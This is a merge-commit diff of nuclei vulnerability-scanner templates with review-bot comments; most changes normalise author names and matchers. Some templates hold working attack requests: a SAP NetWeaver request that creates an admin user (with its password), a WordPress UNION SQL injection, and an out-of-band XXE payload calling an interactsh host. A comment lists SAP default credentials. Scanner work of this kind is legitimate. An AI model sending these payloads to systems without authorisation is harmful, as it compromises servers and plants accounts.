Merge pull request #57 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-06-09 18:38:21 +05:30 committed by GitHub
commit 1f36178d37
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
188 changed files with 456 additions and 305 deletions

View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 329 | vulnerabilities | 175 | exposed-panels | 146 |
| takeovers | 67 | exposures | 105 | technologies | 98 |
| misconfiguration | 67 | workflows | 32 | miscellaneous | 22 |
| cves | 331 | vulnerabilities | 175 | exposed-panels | 145 |
| takeovers | 67 | exposures | 106 | technologies | 99 |
| misconfiguration | 67 | workflows | 32 | miscellaneous | 24 |
| default-logins | 30 | exposed-tokens | 0 | dns | 9 |
| fuzzing | 9 | helpers | 8 | iot | 13 |
| fuzzing | 9 | helpers | 7 | iot | 13 |
**111 directories, 1208 files**.
**112 directories, 1216 files**.
</td>
</tr>
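Review bot: the template-count table is hand-edited and has drifted; the `exposed-tokens | 0` row is left untouched even though this same diff edits token templates (generic-tokens and fcm-server-key, both tagged `exposure,token`), and the per-directory counts do not add up to the `1216 files` total. Generate this block from the tree in CI (the `**112 directories, 1216 files**` line is `tree` output already) instead of hand-patching numbers in every PR.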

View File

@ -2,7 +2,7 @@ id: CVE-2013-2251
info:
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
author: exploitation & @dwisiswant0
author: exploitation,dwisiswant0
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html

View File

@ -2,7 +2,7 @@ id: CVE-2017-14849
info:
name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal
author: Random-Robbie
author: Random_Robbie
severity: high
description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
tags: cve,cve2017,nodejs,lfi
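Review bot: the `name` still reads `Node.js 8.5.0 >=< 8.6.0 Directory Traversal`, and `>=<` is not a version range anyone can parse; the description says "8.5.0 before 8.6.0", so the name should say the same, e.g. `Node.js 8.5.0 Directory Traversal` or `Node.js >=8.5.0 <8.6.0 Directory Traversal`. Worth fixing while the author line is being touched.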

View File

@ -1,6 +1,6 @@
id: CVE-2017-5638
info:
author: Random Robbie
author: Random_Robbie
name: Apache Struts2 RCE
severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attackers invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.

View File

@ -2,7 +2,7 @@ id: CVE-2017-7269
info:
name: Windows Server 2003 & IIS 6.0 RCE
author: thomas_from_offensity & @geeknik
author: thomas_from_offensity,geeknik
severity: critical
description: Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If <http://" in a PROPFIND request.
reference:

View File

@ -2,7 +2,7 @@ id: CVE-2017-7615
info:
name: CVE-2017-7615
author: bp0lr & dwisiswant0
author: bp0lr,dwisiswant0
severity: high
description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
tags: cve,cve2017,mantisbt
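Review bot: `name: CVE-2017-7615` just repeats the `id`, so the finding line nuclei prints carries no information; the description already gives the substance, so something like `MantisBT <= 2.3.0 Arbitrary Password Reset / Admin Access` would be the better name.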

View File

@ -14,7 +14,7 @@ info:
requests:
- raw:
- |
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
@ -26,4 +26,4 @@ requests:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- "dns"
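Review bot: changing the `interactsh_protocol` matcher from `"http"` to `"dns"` weakens the proof of SSRF. A DNS interaction only shows that the target resolved `{{interactsh-url}}` (a URL validator or an outbound proxy does that too), whereas an HTTP interaction shows the server actually fetched `consumerUri`. Since the request was also switched to plain `http://`, an `"http"` match is the stronger and now unproblematic check; if `"dns"` is kept as a fallback, use both words with `condition: or` and at least update the comment, which still says `# Confirms the HTTP Interaction`.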

View File

@ -2,7 +2,7 @@ id: CVE-2017-9841
info:
name: CVE-2017-9841
author: Random-Robbie
author: Random_Robbie
severity: high
description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI
tags: cve,cve2017,php,phpunit,rce
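Review bot: as with CVE-2017-7615, `name: CVE-2017-9841` duplicates the `id`; `PHPUnit eval-stdin.php Remote Code Execution` would make the output self-describing. The description also lacks a terminating period.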

View File

@ -2,7 +2,7 @@ id: CVE-2018-1000129
info:
name: Jolokia XSS
author: mavericknerd @0h1in9e
author: mavericknerd,0h1in9e
severity: high
description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
tags: cve,cve2018,jolokia,xss

View File

@ -2,7 +2,7 @@ id: CVE-2018-1000861
info:
name: Jenkins 2.138 Remote Command Execution
author: dhiyaneshDK & @pikpikcu
author: dhiyaneshDK,pikpikcu
severity: critical
reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
tags: cve,cve2018,jenkin,rce
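Review bot: the tag `jenkin` should be `jenkins`; other templates in the repo use `jenkins`, so `-tags jenkins` will silently skip this one.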

View File

@ -2,7 +2,7 @@ id: CVE-2018-11409
info:
name: Splunk Sensitive Information Disclosure
author: Harsh Bothra
author: harshbothra_
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409
tags: cve,cve2018,splunk

View File

@ -2,7 +2,7 @@ id: CVE-2018-11759
info:
name: Apache Tomcat JK Status Manager Access
author: Harsh Bothra
author: harshbothra_
severity: medium
reference: https://github.com/immunIT/CVE-2018-11759
tags: cve,cve2018,apache

View File

@ -17,7 +17,12 @@ requests:
words:
- "application/x-shockwave-flash"
part: header
- type: word
words:
- "javascript:alert(1337)"
part: body
- type: status
status:
- 200
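Review bot: the new body matcher on `javascript:alert(1337)` only proves reflection if the request (not shown in this hunk) sends exactly that string, and it is only meaningful in combination with the `application/x-shockwave-flash` header and status checks, so please confirm `matchers-condition: and` is set above this list; with the default `or` the template would now fire on any page that echoes the payload.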

View File

@ -2,7 +2,7 @@ id: CVE-2018-19439
info:
name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
author: madrobot & dwisiswant0
author: madrobot,dwisiswant0
severity: high
description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
tags: cve,cve2018,oracle,xss

View File

@ -2,7 +2,7 @@ id: CVE-2018-20824
info:
name: Atlassian Jira WallboardServlet XSS
author: madrobot & dwisiswant0
author: madrobot,dwisiswant0
severity: medium
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
tags: cve,cve2018,atlassian,jira,xss

View File

@ -2,7 +2,7 @@ id: CVE-2019-15858
info:
name: Unauthenticated Woody Ad Snippets WordPress Plugin RCE
author: dwisiswant0 & fmunozs & patralos
author: dwisiswant0,fmunozs,patralos
severity: high
description: |
This template supports the detection part only. See references.

View File

@ -2,7 +2,7 @@ id: CVE-2019-17382
info:
name: Zabbix Authentication Bypass
author: Harsh Bothra
author: harshbothra_
severity: critical
description: An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
reference: https://www.exploit-db.com/exploits/47467

View File

@ -1,7 +1,7 @@
id: CVE-2019-17558
info:
name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template
author: pikpikcu & madrobot
author: pikpikcu,madrobot
severity: critical
refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
tags: cve,cve2019,apache,rce,solr
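Review bot: the context line `refrense:` is a misspelled key, so the NVD link is not picked up as a `reference` by nuclei or the template validator; rename it to `reference:` in this pass.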

View File

@ -2,7 +2,7 @@ id: CVE-2019-19985
info:
name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
author: KBA@SOGETI_ESEC, madrobot & dwisiswant0
author: KBA@SOGETI_ESEC,madrobot,dwisiswant0
severity: medium
description: The WordPress plugin, Email Subscribers & Newsletters, before 4.2.3 had a flaw that allowed unauthenticated file download with user information disclosure.
refrense: https://www.exploit-db.com/exploits/48698
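Review bot: same typo as in CVE-2019-17558: `refrense:` should be `reference:`, otherwise the exploit-db link is dropped from the template metadata.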

View File

@ -0,0 +1,23 @@
id: CVE-2019-2767
info:
name: Oracle Business Intelligence - Publisher XXE
author: madrobot
severity: high
description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher).
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
- https://www.exploit-db.com/exploits/46729
tags: cve,cve2019,oracle,xxe,oob
requests:
- raw:
- |
GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
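Review bot: the payload declares the parameter entity `%sp` (fetched from `http://{{interactsh-url}}/xxe.xml`) and then expands `%param1;`, which is never defined; it only works if the remote DTD defines it, and interactsh does not serve one. Matching on `"dns"` therefore confirms only that the hostname was resolved, while the parser fetching the DTD would produce an `"http"` interaction, which is the stronger evidence of out-of-band XXE; consider `words: ["http", "dns"]` with `condition: or`. Also "The supported version that is affected are" should read "The supported versions that are affected are".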

View File

@ -1,6 +1,6 @@
id: CVE-2019-3396
info:
author: Harsh Bothra
author: harshbothra_
name: Atlassian Confluence Path Traversal
severity: high
description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.

View File

@ -2,7 +2,7 @@ id: CVE-2019-8449
info:
name: JIRA Unauthenticated Sensitive Information Disclosure
author: Harsh Bothra
author: harshbothra_
severity: medium
description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
reference: |

View File

@ -2,7 +2,7 @@ id: CVE-2019-9978
info:
name: WordPress social-warfare RFI
author: madrobot & dwisiswant0
author: madrobot,dwisiswant0
severity: critical
description: The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.
reference: https://github.com/mpgn/CVE-2019-9978
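Review bot: `name` says `RFI` and `severity: critical`, while the description describes a stored XSS via `swp_url`; the two disagree about what the template detects. Say which behaviour the request actually tests for in the name, and make the severity follow that.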

View File

@ -2,7 +2,7 @@ id: CVE-2020-12720
info:
name: CVE-2020-12720 vBulletin SQLI
author: pdnuclei - projectdiscovery.io
author: pdteam
severity: critical
description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.
reference: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
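Review bot: the name calls this `vBulletin SQLI` but the description only says "incorrect access control"; one of the two should be adjusted so a reader knows what the template exercises. The `CVE-2020-12720` prefix in the name also duplicates the `id`.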

View File

@ -2,7 +2,7 @@ id: CVE-2020-5284
info:
name: Next.js .next/ limited path traversal
author: Harsh & Rahul & dwisiswant0
author: rootxharsh,iamnoooob,dwisiswant0
severity: medium
description: Next.js versions before 9.3.2 have a directory traversal vulnerability. Attackers could craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. This issue is fixed in version 9.3.2.
tags: cve,cve2020,nextjs,lfi

View File

@ -2,7 +2,7 @@ id: CVE-2020-5405
info:
name: Spring Cloud Directory Traversal
author: Harsh Bothra
author: harshbothra_
severity: high
description: Spring Cloud Config, versions 2.2.x prior to 2.2.2, versions 2.1.x prior to 2.1.7, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.
reference: https://pivotal.io/security/cve-2020-5405

View File

@ -2,7 +2,7 @@ id: CVE-2020-5902
info:
name: F5 BIG-IP TMUI RCE
author: madrobot & dwisiswant0 & ringo
author: madrobot,dwisiswant0,ringo
severity: high
description: In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
reference: |
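Review bot: `severity: high` is inconsistent for an unauthenticated RCE in TMUI; CVE-2021-22986 in this same diff (iControl REST unauthenticated RCE on the same product) is rated `critical`. Align this one to `critical`.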

View File

@ -1,7 +1,7 @@
id: CVE-2020-6287
info:
name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
name: SAP NetWeaver - Remote Admin addition
author: dwisiswant0
severity: critical
tags: cve,cve2020,sap
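Review bot: the new name `SAP NetWeaver - Remote Admin addition` drops the vulnerable component (`LM Configuration Wizard`) and is less precise than the old one; something like `SAP NetWeaver AS JAVA (LM Configuration Wizard) - Unauthenticated Admin User Creation` keeps both the component and the effect.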
@ -11,24 +11,32 @@ info:
- https://launchpad.support.sap.com/#/notes/2934135
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
- https://www.onapsis.com/recon-sap-cyber-security-vulnerability
- https://github.com/chipik/SAP_RECON
requests:
- payloads:
data: helpers/payloads/CVE-2020-6287.xml
raw:
- raw:
- |
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml; charset=UTF-8
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('§data§')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>
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
</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
# userName - sapRpoc6351
# password - Secure!PwD8890
matchers-condition: and
matchers:
- type: word
words:
- "urn:CTCWebServiceSi"
- "CTCWebServiceSi"
- "SOAP-ENV"
part: body
condition: and
- type: status
status:
- 200
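Review bot: this template is not a detection; a successful request creates a user on the target, with the credentials documented only in trailing comments (`# userName - sapRpoc6351`, `# password - Secure!PwD8890`). The `info` block has no `description` at all, so add one that states the side effect and the account that must be removed afterwards. Note also that the inline payload replaces `helpers/payloads/CVE-2020-6287.xml` (deleted in this diff), whose payload used a different username/password, so anyone cleaning up after earlier runs needs both sets listed.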
@ -36,4 +44,5 @@ requests:
- type: word
words:
- "text/xml"
part: header
- "SAP NetWeaver Application Server"
part: header
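Review bot: this header word matcher has no `condition`, so it defaults to `or` and `text/xml` alone satisfies it; the added `SAP NetWeaver Application Server` string then changes nothing. If both are meant to be required, add `condition: and`.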

View File

@ -2,7 +2,7 @@ id: CVE-2020-8115
info:
name: Revive Adserver XSS
author: madrobot & dwisiswant0
author: madrobot,dwisiswant0
severity: medium
description: |
A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim.

View File

@ -2,7 +2,7 @@ id: CVE-2020-8512
info:
name: IceWarp WebMail XSS
author: pdnuclei & dwisiswant0
author: pdteam,dwisiswant0
severity: medium
description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.
reference: |

View File

@ -1,7 +1,7 @@
id: CVE-2021-22986
info:
name: F5 BIG-IP iControl REST unauthenticated RCE
author: Harsh Jaiswal (@rootxharsh) & Rahul Maini (@iamnoooob)
author: rootxharsh,iamnoooob
severity: critical
tags: bigip,cve,cve2021,rce
description: The iControl REST interface has an unauthenticated remote command execution vulnerability.

View File

@ -0,0 +1,33 @@
id: CVE-2021-24285
info:
name: Car Seller - Auto Classifieds Script WordPress plugin SQLI
author: ShreyaPohekar
severity: critical
description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
tags: cve,cve2021,wordpress,wp-plugin,sqli
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-24285
- https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
- https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 47
action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"
part: body
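Review bot: `Content-Length: 47` does not match the body, which is well over 200 bytes. nuclei recomputes the header for raw requests unless `unsafe: true` is set, so the line is misleading at best; drop it. The spaces in the `order_id` value should also be form-encoded (`+` or `%20`) since the body is declared `application/x-www-form-urlencoded`. The `CONCAT(0x717a767671,...,0x7171786b71)` marker does decode to the string in the matcher, so the detection logic itself is fine.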

View File

@ -2,7 +2,7 @@ id: rabbitmq-default-admin
info:
name: RabbitMQ Default Credentials
author: fyoorer & dwisiswant0
author: fyoorer,dwisiswant0
severity: high
tags: rabbitmq,default-login

View File

@ -2,7 +2,7 @@ id: dead-host-with-cname
info:
name: dead-host-with-cname
author: pdnuclei - projectdiscovery.io
author: pdteam
severity: info
tags: dns

View File

@ -1,7 +1,7 @@
id: adminer-panel
info:
name: Adminer Login panel
author: random-robbie & meme-lord
author: random_robbie,meme-lord
severity: info
reference: https://blog.sorcery.ie/posts/adminer/
tags: panel

View File

@ -1,7 +1,7 @@
id: jmx-console
info:
name: JMX Console
author: Yash Anand @yashanand155
author: yashanand155
severity: low
tags: panel

View File

@ -2,7 +2,7 @@ id: joomla-panel
info:
name: Joomla Panel
author: github.com/its0x08
author: its0x08
severity: info
tags: panel

View File

@ -2,7 +2,7 @@ id: mobileiron-login
info:
name: MobileIron Login
author: dhiyaneshDK & @dwisiswant0
author: dhiyaneshDK,dwisiswant0
Severity: info
tags: panel
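Review bot: the context line `Severity: info` has a capitalised key; YAML keys are case-sensitive, so this template has no `severity` as far as nuclei and the validator are concerned. Fix it to `severity:` while the author line is being normalised.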

View File

@ -2,7 +2,7 @@ id: open-stack-dashboard-login
info:
name: OpenStack Dashboard
author: dhiyaneshDK & hackergautam
author: dhiyaneshDK,hackergautam
severity: info
reference: https://www.exploit-db.com/ghdb/6464
tags: panel,openstack

View File

@ -2,7 +2,7 @@ id: public-tomcat-manager
info:
name: tomcat manager disclosure
author: Ahmed Sherif & geeknik
author: Ahmed Sherif,geeknik
severity: info
tags: panel
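Review bot: `Ahmed Sherif,geeknik` keeps a space inside an author name while every other entry in this diff is converted to a handle; pick a handle (or at least a space-free form) so the comma-separated list stays parseable and consistent.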

View File

@ -1,10 +1,10 @@
id: sap-netweaver-portal-detect
id: sap-netweaver-portal
info:
name: SAP NetWeaver Portal detect
name: SAP NetWeaver Portal
author: organiccrap
severity: info
tags: panel
tags: panel,sap
# SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2&
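Review bot: renaming the `id` from `sap-netweaver-portal-detect` to `sap-netweaver-portal` is a breaking change for anyone referencing the old id in workflows or `-id` filters; check the `workflows/` directory for references. The trailing comment listing default credentials would be more useful as a `description`/`reference` entry, where it surfaces in output.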

View File

@ -1,36 +0,0 @@
id: sap-recon-detect
info:
name: SAP RECON Finder
author: samueladi_ & organiccrap
severity: medium
tags: panel
# Source:- https://github.com/chipik/SAP_RECON
# This is detection template, please use above poc to exploit this further.
requests:
- method: GET
path:
- "{{BaseURL}}/CTCWebService/CTCWebServiceBean"
- "{{BaseURL}}/CTCWebService/CTCWebServiceBean?wsdl"
- "{{BaseURL}}/CTCWebService/Config1?wsdl"
matchers-condition: and
matchers:
- type: word
words:
- Method Not Allowed
- Expected request method POST. Found GET.
- Generated by WSDLDefinitionsParser
- bns0:Config1Binding
- wsdl:definitions
- tns:CTCWebServiceSiBinding
condition: or
- type: status
status:
- 405
- 200
condition: or
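Review bot: deleting `sap-recon-detect` removes the only non-intrusive check for the RECON endpoint; its own comment says it is the detection template to run before the PoC. The CVE-2020-6287 template in this diff creates a user on the target, so users lose the safe option. Consider keeping this as a `sap`-tagged detection (the WSDL/`Method Not Allowed` probe) rather than deleting it.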

View File

@ -2,7 +2,7 @@ id: traefik-dashboard-detect
info:
name: Traefik Dashboard
author: schniggie & StreetOfHackerR007
author: schniggie,StreetOfHackerR007
severity: info
tags: panel

View File

@ -2,7 +2,7 @@ id: webeditors
info:
name: Web Editors
author: pwnmachine
author: princechaddha
severity: info
tags: panel

View File

@ -2,7 +2,7 @@ id: wadl-api
info:
name: wadl file disclosure
author: 0xrudra & manuelbua
author: 0xrudra,manuelbua
severity: info
tags: exposure,api
reference: |

View File

@ -2,7 +2,7 @@ id: default-sql-dump
info:
name: MySQL Dump Files
author: geeknik & @dwisiswant0
author: geeknik,dwisiswant0
severity: medium
tags: exposure,backup

View File

@ -2,7 +2,7 @@ id: zip-backup-files
info:
name: Compressed Web File
author: Toufik Airane & @dwisiswant0
author: Toufik Airane,dwisiswant0
severity: medium
tags: exposure,backup
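Review bot: `Toufik Airane,dwisiswant0` has the same space-in-author issue as `public-tomcat-manager`; normalise to a handle for consistency with the rest of this change.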

View File

@ -2,7 +2,7 @@ id: docker-compose-config
info:
name: docker-compose.yml exposure
author: meme-lord & blckraven & geeknik
author: meme-lord,blckraven,geeknik
severity: medium
tags: config,exposure,devops

View File

@ -2,7 +2,7 @@ id: exposed-svn
info:
name: Exposed SVN Directory
author: udit_thakkur & dwisiswant0
author: udit_thakkur,dwisiswant0
severity: medium
tags: config,exposure,svn

View File

@ -2,7 +2,7 @@ id: git-config
info:
name: Git Config Disclosure
author: pdteam & pikpikcu
author: pdteam,pikpikcu
severity: medium
description: Searches for the pattern /.git/config on passed URLs.
tags: config,git,exposure

View File

@ -2,7 +2,7 @@ id: laravel-env
info:
name: Laravel .env file accessible
author: pxmme1337 & dwisiswant0 & geeknik & emenalf
author: pxmme1337,dwisiswant0,geeknik,emenalf
severity: critical
description: Laravel uses the .env file to store sensitive information like database credentials and tokens. It should not be publicly accessible.
reference: https://laravel.com/docs/master/configuration#environment-configuration

View File

@ -2,7 +2,7 @@ id: package-json
info:
name: npm package.json disclosure
author: geeknik & afaq
author: geeknik,afaq
severity: info
description: All npm packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project.
tags: config,exposure

View File

@ -2,7 +2,7 @@ id: phpinfo-files
info:
name: phpinfo Disclosure
author: pdteam & daffainfo & meme-lord
author: pdteam,daffainfo,meme-lord
severity: low
tags: config,exposure

View File

@ -2,7 +2,7 @@ id: rails-database-config
info:
name: Ruby-on-Rails Database Configuration Exposure
author: pdteam & geeknik
author: pdteam,geeknik
severity: low
tags: config,exposure,rails

View File

@ -1,7 +1,7 @@
id: server-private-keys
info:
name: Detect Private SSH and TLS Keys
name: Detect Private SSH, TLS, and JWT Keys
author: geeknik
severity: high
tags: config,exposure
@ -25,6 +25,10 @@ requests:
- "{{BaseURL}}/.ssh/id_dsa"
- "{{BaseURL}}/{{Hostname}}.key"
- "{{BaseURL}}/{{Hostname}}.pem"
- "{{BaseURL}}/config/jwt/private.pem"
- "{{BaseURL}}/jwt/private.pem"
- "{{BaseURL}}/var/jwt/private.pem"
- "{{BaseURL}}/private.pem"
matchers-condition: and
matchers:

View File

@ -1,9 +1,10 @@
id: shellscripts
info:
name: Published shellscripts
name: Public shellscripts
author: panch0r3d
severity: info
severity: low
tags: bash,exposure
requests:
- method: GET
@ -25,17 +26,24 @@ requests:
- "{{BaseURL}}/wp-setup.sh"
- "{{BaseURL}}/deploy.sh"
- "{{BaseURL}}/aws.sh"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/x-sh"
- "text/plain"
- "text/x-sh"
part: header
condition: or
- type: regex
regex:
- ".*?bin.*?sh"
- ".*?bin.*?bash"
part: body
condition: or
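Review bot: the body regexes `.*?bin.*?sh` and `.*?bin.*?bash` are far too loose: the first matches any text containing `bin` followed anywhere later by `sh` (`binding ... shell`, `cabinet ... fresh`), and the second is a subset of it. Combined with `text/plain` as an accepted content type this will fire on ordinary 200 pages. Anchor on the shebang instead, e.g. `#!\s*/(usr/)?bin/(env\s+)?(ba|z|k|da)?sh`, and drop the redundant second pattern.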

View File

@ -1,7 +1,7 @@
id: error-logs
info:
name: common error log files
author: geeknik & daffainfo
author: geeknik,daffainfo
severity: low
tags: logs,exposure

View File

@ -2,7 +2,7 @@ id: laravel-log-file
info:
name: Laravel log file publicly accessible
author: sheikhrishad & geeknik
author: sheikhrishad,geeknik
severity: high
description: The log file of this Laravel web app might reveal details on the inner workings of the app, possibly even tokens, credentials or personal information.
reference: https://laravel.com/docs/master/logging

View File

@ -2,7 +2,7 @@ id: generic-tokens
info:
name: Generic Tokens
author: nadino & geeknik
author: nadino,geeknik
severity: info
tags: exposure,token

View File

@ -2,7 +2,7 @@ id: fcm-server-key
info:
name: FCM Server Key
author: Abss (@absshax)
author: absshax
severity: high
tags: exposure,token,google
reference: https://abss.me/posts/fcm-takeover

View File

@ -1,7 +1,7 @@
id: adminer-panel-fuzz
info:
name: Adminer Login Panel Fuzz
author: random-robbie & meme-lord
author: random_robbie,meme-lord
severity: info
reference: https://blog.sorcery.ie/posts/adminer/
tags: fuzz,adminer

View File

@ -1,7 +1,7 @@
id: generic-lfi-fuzzing
info:
name: Generic LFI Test
author: geeknik & unstabl3
author: geeknik,unstabl3
severity: high
description: A generic test for Local File Inclusion
tags: fuzz,lfi

View File

@ -1 +0,0 @@
<root><user><JavaOrABAP>java</JavaOrABAP><username>projectdiscover</username><password>proj3ctD1$c0v3ry</password><userType></userType></user></root>

View File

@ -4,6 +4,7 @@ info:
name: Apple app site association for harvesting end points
author: panch0r3d
severity: info
tags: misc
requests:
- method: GET
@ -11,16 +12,25 @@ requests:
- "{{BaseURL}}/.well-known/apple-app-site-association"
- "{{BaseURL}}/well-known/apple-app-site-association"
- "{{BaseURL}}/apple-app-site-association"
redirects: true
max-redirects: 2
headers:
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
max-redirects: 1
matchers-condition: and
matchers:
- type: regex
regex:
- '(a|A)(p|P)(p|P)(l|L)(i|I)(n|N)(k|K)(s|S)'
- type: word
words:
- 'applinks'
- 'appID'
- 'paths'
part: body
condition: and
- type: word
words:
- 'application/json'
part: header
- type: status
status:
- 200
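Review bot: `max-redirects: 1` is kept while `redirects: true` is removed, so the setting is dead config; either restore `redirects: true` or drop `max-redirects` too. Also, requiring `application/json` in the header will skip AASA files served with other content types (older deployments served a signed `application/pkcs7-mime` file); the three-word body match with `condition: and` is already a strong signal, so consider making the content-type check optional.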

View File

@ -2,7 +2,7 @@ id: dir-listing
info:
name: Directory listing enabled
author: _harleo & pentest_swissky
author: _harleo,pentest_swissky
severity: info
tags: misc

View File

